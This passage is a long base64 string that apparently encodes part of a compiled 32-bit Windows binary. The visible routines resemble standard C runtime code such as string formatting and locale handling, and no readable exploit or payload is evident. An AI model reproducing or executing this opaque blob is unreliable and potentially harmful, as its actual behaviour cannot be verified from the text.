+//+LXRCJjTjl//+F2w+EigEAAMeFFOX//woAAACDpRjl//8AjYVI5f//i7045f//K8qLlRjl//87y3M7D7c3g8ECg8cCib045f//Zju1FOX//3USag1fZok4g8ACi7045f//g8ICZokwg8ICg8ACgfqoBgAAcsEz9o2NnPL//1ZWaFUNAABRjY1I5f//K8GZK8LR+FCLwVBWaOn9AAD/FXQAARCLtUDl//+LvTTl//+JhTzl//+FwA+EAP3//zPJiY1A5f//agArwY2VIOX//1JQjYWc8v//A8GLjSTl//9Qi4Uo5f//iwSFEIcBEP80Af8VLAABEIXAdB6LjUDl//8DjSDl//+LhTzl//+JjUDl//87wX+v6xr/FRwAARCLjUDl//+L+IuFPOX//4m9NOX//zvBD4+a/f//i4045f//i/GLlTDl//8r8om1QOX//zvzD4LE/v//6Xf9//9qAI2VIOX//1L/dRD/tTDl////NAj/FSwAARCFwA+EPfz//4u1IOX//zP/6Uf9//9X6Iq0//9Z6zyLlTDl//+LhSjl//+LjSTl//+LBIUQhwEQ9kQBBEB0CYA6GnUEM8DrHOh6tP//xwAcAAAA6Du0//+DIACDyP/rBCvxi8Zbi038XzPNXugyg///i+Vdw2oYaNhgARDoEqP//4PO/4l12Il13It9CIP//nUY6Pyz//+DIADoKLT//8cACQAAAOm9AAAAhf8PiJ0AAAA7PSSiARAPg5EAAACLx8H4BYlF5Ivfg+MfweMGiwSFEIcBEA++RBgEg+ABdHBX6JgoAABZg2X8AItF5IsEhRCHARD2RBgEAXQY/3UU/3UQ/3UMV+hnAAAAg8QQi/CL2usV6K+z///HAAkAAADocLP//4MgAIveiXXYiV3cx0X8/v///+gNAAAAi9PrK4t9CItd3It12FfoqykAAFnD6D+z//+DIADoa7P//8cACQAAAOjbr///i9aLxuhoov//w1WL7FFRVot1CFdW6BApAACDz/9ZO8d1Eeg5s///xwAJAAAAi8eL1+tE/3UUjU34Uf91EP91DFD/FQgBARCFwHUP/xUcAAEQUOjosv//WevTi8aD5h/B+AXB5gaLBIUQhwEQgGQwBP2LRfiLVfxfXovlXcNVi+z/BSCRARBWvgAQAABW6AOh//9Zi00IiUEIhcB0CYNJDAiJcRj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/iYWo/f//WYXAdAqL8Im9xP3//+sKx4Xc/f//owAAAIu95P3//4sHg8cIiYWA/f//ib3k/f//i0f8iYWE/f//jYWQ/f//UP+1sP3//w++wv+13P3//1D/tcT9//+NhYD9//9WUP81WHMBEP8VSAABEP/Qi/uDxByB54AAAAB0IYO93P3//wB1GI2FkP3//1BW/zVkcwEQ/xVIAAEQ/9BZWYC97/3//2d1HIX/dRiNhZD9//9QVv81YHMBEP8VSAABEP/QWVmAPi0PhSj+//+BywABAABGiZ3o/f//6Rb+///Hhdz9//8IAAAAagfrHIPocw+E3/z//0hID4SW/v//g+gDD4VrAQAAaifHhdj9//8QAAAAWImFrP3//4TbD4l8/v//BFHGhdT9//8wiIXV/f//x4XM/f//AgAAAOle/v//g8cEM/aJveT9///2wyB0EfbDQHQGD79H/OsOD7dH/OsI9sNAdAqLR/yZi8iL+usFi0/8i/72w0B0HDv+fxh8BDvOcxL32RP+99+BywABAACJnej9///3wwCQAAB1Aov+i5Xc/f//hdJ5BTPSQusUg+P3uAACAACJnej9//870H4Ci9CLwQvHdQaJtcz9//+NdfOLwkqJldz9//+FwH8Gi8ELx3Q9i4XY/f//mVJQV1HoqQgAAIPBMImdjP3//4mFxP3//4v6g/k5fgYDjaz9//+Lldz9//+IDk6LjcT9///rsIud6P3//41F8yvGRomF2P3///fDAAIAAHQ2hcB0BYA+MHQtTv+F2P3//8YGMOshhfZ1Bos1cHEBEIvG6wdJgDgAdAVAhcl19SvGiYXY/f//g724/f//AA+FhgEAAPbDQHQ198MAAQAAdAnGhdT9//8t6xr2wwF0CcaF1P3//yvrDPbDAnQRxoXU/f//IMeFzP3//wEAAACLvcD9//8rvdj9//+Lhcz9//8r+PbDDHUejYXg/f//UP+10P3//1dqIOgSAgAAi4XM/f//g8QQ/7Wk/f//jY3g/f//Uf+10P3//1CNhdT9//9Q6BUCAACDxBT2wwh0HfbDBHUYjYXg/f//UP+10P3//1dqMOjHAQAAg8QQg728/f//AIuF2P3//3R9hcB+eYvOSImFxP3//w+3AYPBAlBqBo1F9ImNjP3//1CNhaD9//9Q6AsHAACDxBCFwHU/OYWg/f//dDf/taT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